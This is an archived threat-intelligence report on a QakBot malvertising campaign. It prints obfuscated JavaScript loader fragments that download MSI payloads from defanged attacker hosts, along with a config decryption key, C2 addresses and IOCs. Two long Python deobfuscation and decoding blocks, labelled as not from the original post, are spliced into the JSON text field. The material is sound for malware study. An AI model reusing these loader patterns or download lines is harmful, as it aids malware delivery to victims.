{
	"id": "7e294ca3-6d81-433b-a66e-6f861c1fa8eb",
	"created_at": "2026-04-06T00:18:25.038506Z",
	"updated_at": "2026-04-10T03:21:38.99414Z",
	"deleted_at": null,
	"sha1_hash": "f9430c3c88c02c2d51dd65a5184bf3e085e2e058",
	"title": "Qbot testing malvertising campaigns?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 696218,
	"plain_text": "Qbot testing malvertising campaigns?\r\nBy Jason Reaves\r\nPublished: 2023-03-03 · Archived: 2026-04-05 13:13:09 UTC\r\nBy: Jason Reaves, Josh Platt, Jonathan McCay and Kirk Sayre\r\nMalvertising has seen a significant uptick recently. It is the practice of threat actors buying pay-per-click (PPC) ads on search engine ad platforms in order to distribute malware masquerading as legitimate software.\r\nBrad Duncan put out an article showing Screenshotter[3] being delivered via malvertising on Google Ads[1]. While investigating the listed C2 server, I noticed what appeared to be two naming conventions being used:\r\nRef: https://www.virustotal.com/gui/domain/acehphonnajaya.com/relations\r\nThe ones named Document show up in redirect chains that can be seen on UrlScan:\r\nRef: https://urlscan.io/search/#bobforlacitycouncil.com\r\nWe can find emails uploaded to VirusTotal with some of these links onboard, for example a3c19a469f6a9337c8e33fb9249e6381eeebd5ab:\r\nGood day,\r\nI really need your opinion on all these files in the attachment.\r\nVIEW FILES \u003chxxps://homepagego[.com/scd3b\u003e\r\nHave a great day\r\nBonjour M. Amadou, (Hello Mr. Amadou,)\r\nPivot to a QakBot\r\nThe TeamViewer-named JavaScript files stand out as they appear to be based on a template of some kind, for example ef930c5607b24cd1b106a944e62e67c5004795a5. A few interesting pieces of this file:\r\nanExpression = 4 * (4 / 5) + 5;\r\naSecondExpression = Math.PI * radius * radius;\r\ng = \"w\";f = \"h\";o = \"p\";heskkr = \".\";p = \".co\";s = \"n\";u = \"i\";ka = \"ke\";n = \"t\";\r\nvar today = new Date();\r\nvar a = new Array(4);\r\nkRate.InstallProduct(sAssign);\r\nThese pieces can be pivoted on to find a similarly named JavaScript file, 44221d33eb4f6c9f7067cd7ddb1d8feb43ded30a, which has definite overlap in the template that was used:\r\nanExpression = 4 * (4 / 5) + 5;\r\naSecondExpression = Math.PI * radius * radius;\r\ng = \"w\";f = \"h\";o = \"p\";h = \".\";p = \"c\";s = \"n\";u = \"i\";ka = \"1\";n = \"t\";\r\nvar today = new Date();\r\nvar a = new Array(4);\r\nk.InstallProduct(String.fromCharCode(Math.random()*0+104)+String.fromCharCode(Math.random()*0+116)+St\r\nThe difference in this case, however, is what is downloaded:\r\nhxxp://richtools[.]info/qqq.msi\r\nPivoting on the TLSH of this file also leads to another JavaScript file, 5ea8d40ca22df82aa4512bb359748dbbe1844ec8:\r\nvar url = \"hxxp://216.120.201[.]170/downloads/ZoomInstallerFull.msi\"\r\nThis time possibly a Zoom theme?\r\n
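The two idioms in these loaders are cheap to undo statically: Math.random()*0 is always 0, so every String.fromCharCode(Math.random()*0+N) call is the constant character chr(N) (104 and 116 are 'h' and 't'), and the single-letter variables (g, f, o, ...) are string fragments concatenated with + into the download URL. The following is an added example, not code from the original post: a small Python deobfuscator for this template. The SAMPLE script inside it is constructed for the example, since the InstallProduct() argument is truncated in the post; the full URL it yields is an assumption used only to exercise the decoder.

```python
import re

# Added example, not code from the original post.
# Two obfuscation idioms from the TeamViewer-themed QakBot JS loaders:
#  1. String.fromCharCode(Math.random()*0+N): Math.random()*0 is always 0,
#     so the call is the constant character chr(N).
#  2. Single-letter string variables (g = 'w'; f = 'h'; ...) that are later
#     concatenated with + into the download URL.

CHARCODE = re.compile(
    r'String[.]fromCharCode[(]Math[.]random[(][)][*]0[+]([0-9]+)[)]'
)
# Target call observed in the samples; its argument is the concatenation chain.
CALL = re.compile(r'InstallProduct[(]([^)]*)[)]')
QUOTES = (chr(34), chr(39))  # double and single quote characters


def fold_charcodes(expr):
    # Replace each constant fromCharCode() call with a quoted one-char literal.
    q = chr(39)
    return CHARCODE.sub(lambda m: q + chr(int(m.group(1))) + q, expr)


def is_literal(term):
    # True for a quoted string literal such as 'abc'.
    return term[:1] in QUOTES and term[-1:] == term[:1] and len(term) != 1


def collect_string_vars(script):
    # Map every plain   name = 'fragment';   statement to its value.
    env = {}
    for stmt in script.split(';'):
        if '=' not in stmt:
            continue
        name, _, value = stmt.partition('=')
        name, value = name.strip(), value.strip()
        if name.isidentifier() and is_literal(value):
            env[name] = value[1:-1]
    return env


def resolve(expr, env):
    # Join a + chain, substituting known variables and literals.
    # Anything unresolved is kept as [term] so a reviewer can see the gap.
    out = []
    for term in fold_charcodes(expr).split('+'):
        term = term.strip()
        if term in env:
            out.append(env[term])
        elif is_literal(term):
            out.append(term[1:-1])
        elif term:
            out.append('[' + term + ']')
    return ''.join(out)


def deobfuscate(script):
    # Return the resolved argument of every InstallProduct() call in the script.
    env = collect_string_vars(script)
    return [resolve(m.group(1), env) for m in CALL.finditer(fold_charcodes(script))]


# Constructed sample in the shape of the loader quoted in the post. The post's
# InstallProduct() argument is truncated, so the full URL here is an assumption.
SAMPLE = '''
anExpression = 4 * (4 / 5) + 5;
aSecondExpression = Math.PI * radius * radius;
g = 'w';f = 'h';o = 'p';heskkr = '.';p = '.co';s = 'n';u = 'i';ka = 'ke';n = 't';
var today = new Date();
var a = new Array(4);
kRate.InstallProduct(String.fromCharCode(Math.random()*0+104)+String.fromCharCode(Math.random()*0+116)+String.fromCharCode(Math.random()*0+116)+o+String.fromCharCode(Math.random()*0+58)+String.fromCharCode(Math.random()*0+47)+String.fromCharCode(Math.random()*0+47)+g+g+g+heskkr+'example'+p);
'''

if __name__ == '__main__':
    for url in deobfuscate(SAMPLE):
        print(url)
```

To use it on a real sample, pass the script text to deobfuscate(). A result containing [term] placeholders means the template used a construct this tokenizer does not model, such as a variable assigned from another expression rather than from a literal, and is the place to look next.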
The first domain delivering qqq.msi (richtools[.]info) was delivering this MSI package:\r\n72cef301ca25db6f1aa42f9380ab12ae2e99a725\r\nInside this package resides a QakBot stager. The config encoding has been slightly changed[2] since the last time I checked:\r\nimport hashlib\r\nfrom Crypto.Cipher import ARC4  # pycryptodome\r\nimport qbot_helpers  # the author's existing QakBot helper module, see [2]\r\n\r\ndef decode_data4(data):\r\n    # RC4 key is the SHA1 digest of a hard-coded string\r\n    key = hashlib.sha1(b'bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN').digest()\r\n    rc4 = ARC4.new(key)\r\n    t = rc4.decrypt(data)\r\n    # skip the 20-byte prefix, then apply the previously used QakBot decoding\r\n    tt = qbot_helpers.qbot_decode(t[20:])\r\n    return tt\r\nNothing too new, just multiple previously used methods to decrypt the config. Parsing is also slightly different, with the addition of a new flag value mixed in:\r\nimport struct\r\n\r\ndef parse_c2(data):\r\n    # C2 entries are either 7 bytes (flag, IPv4, big-endian port) or 8 bytes (the same plus a trailing flag byte)\r\n    out = \"\"\r\n    if len(data) % 7 == 0:\r\n        for i in range(0, len(data), 7):\r\n            if i \u003e 1:\r\n                out += ','\r\n            (f, o1, o2, o3, o4, p) = struct.unpack_from('\u003eBBBBBH', data[i:])\r\n            out += \"{} | {}.{}.{}.{}:{}\".format(f, o1, o2, o3, o4, p)\r\n            if len(data[i+7:]) \u003c 7:\r\n                break\r\n    elif len(data) % 8 == 0:\r\n        for i in range(0, len(data), 8):\r\n            if i \u003e 1:\r\n                out += ','\r\n            (f, o1, o2, o3, o4, p, ff) = struct.unpack_from('\u003eBBBBBHB', data[i:])\r\n            out += \"{} | {}.{}.{}.{}:{} | {}\".format(f, o1, o2, o3, o4, p, ff)\r\n            if len(data[i+8:]) \u003c 8:\r\n                break\r\n    return out\r\nQakBot config:\r\n{'CONF1': b'10=BB12\\r\\n3=1675090602\\r\\n', 'C2': '1 | 24.9.220.167:443 | 1,1 | 92.239.81.124:443 | 1,1\r\nIOCs:\r\nrichtools.info\r\n216.120.201.170\r\nJS:\r\n44221d33eb4f6c9f7067cd7ddb1d8feb43ded30a\r\n5ea8d40ca22df82aa4512bb359748dbbe1844ec8\r\nMSI:\r\n72cef301ca25db6f1aa42f9380ab12ae2e99a725\r\nReferences\r\n1: https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376\r\n2: https://gist.github.com/sysopfb/8c71915b065a54e458b188fec8333c22\r\n3: https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me\r\n
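As an added worked example (not the post's own code), the outer RC4 layer of decode_data4() and the C2 record parser described above are reimplemented below in pure Python, so the 7-byte and 8-byte record layouts can be exercised offline without pycryptodome. The post's inner qbot_decode() helper from [2] is not reproduced; the constructed blob therefore holds C2 records directly behind the 20-byte prefix, which is an assumption made for this example only. The ! prefix in the struct formats is the network-order (big-endian) spelling of the format string used in the post.

```python
import hashlib
import struct

# Added example, not code from the original post. Pure-Python RC4 replaces
# pycryptodome's ARC4 so the outer config layer can be exercised offline.

KEY_STRING = b'bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN'  # hard-coded string from the post


def rc4(key, data):
    # Plain RC4 (KSA then PRGA). The same call encrypts and decrypts.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def config_key():
    # Same derivation as decode_data4(): SHA1 digest of the hard-coded string.
    return hashlib.sha1(KEY_STRING).digest()


def parse_c2(data):
    # 7-byte records: flag, four IPv4 octets, big-endian port.
    # 8-byte records: the same plus a trailing flag byte (the newer layout).
    # Width is picked by divisibility, 7 first, exactly as the post does.
    if len(data) % 7 == 0:
        width, fmt = 7, '!BBBBBH'
    elif len(data) % 8 == 0:
        width, fmt = 8, '!BBBBBHB'
    else:
        raise ValueError('C2 blob of %d bytes is not a multiple of 7 or 8' % len(data))
    records = []
    for off in range(0, len(data), width):
        fields = struct.unpack_from(fmt, data, off)
        rec = {'flag': fields[0], 'host': '%d.%d.%d.%d:%d' % fields[1:6]}
        if width == 8:
            rec['flag2'] = fields[6]
        records.append(rec)
    return records


def decode_c2_blob(blob):
    # Outer layer of decode_data4(): RC4 with the SHA1 key, drop the 20-byte
    # prefix, then parse. The post's inner qbot_decode() step is omitted here,
    # so the blob must already hold raw C2 records (assumption for this example).
    return parse_c2(rc4(config_key(), blob)[20:])


def build_sample_blob():
    # Constructed for this example: two 8-byte records carrying the C2 addresses
    # printed in the post, behind a 20-byte prefix, RC4-encrypted with the same
    # key so decode_c2_blob() round-trips it offline.
    records = struct.pack('!BBBBBHB', 1, 24, 9, 220, 167, 443, 1)
    records += struct.pack('!BBBBBHB', 1, 92, 239, 81, 124, 443, 1)
    prefix = hashlib.sha1(records).digest()  # 20 bytes, the size decode_data4() skips
    return rc4(config_key(), prefix + records)


if __name__ == '__main__':
    for rec in decode_c2_blob(build_sample_blob()):
        print(rec)
```

The divisibility test inherits the post's ambiguity: a blob whose length is a multiple of both 7 and 8 (56, 112, ...) is read as 7-byte records, so when the parsed ports look wrong for such a length, retry with the 8-byte format before trusting the output.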
Source: https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a"
	],
	"report_names": [
		"qbot-testing-malvertising-campaigns-3e2552cbc69a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434705,
	"ts_updated_at": 1775791298,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9430c3c88c02c2d51dd65a5184bf3e085e2e058.pdf",
		"text": "https://archive.orkl.eu/f9430c3c88c02c2d51dd65a5184bf3e085e2e058.txt",
		"img": "https://archive.orkl.eu/f9430c3c88c02c2d51dd65a5184bf3e085e2e058.jpg"
	}
}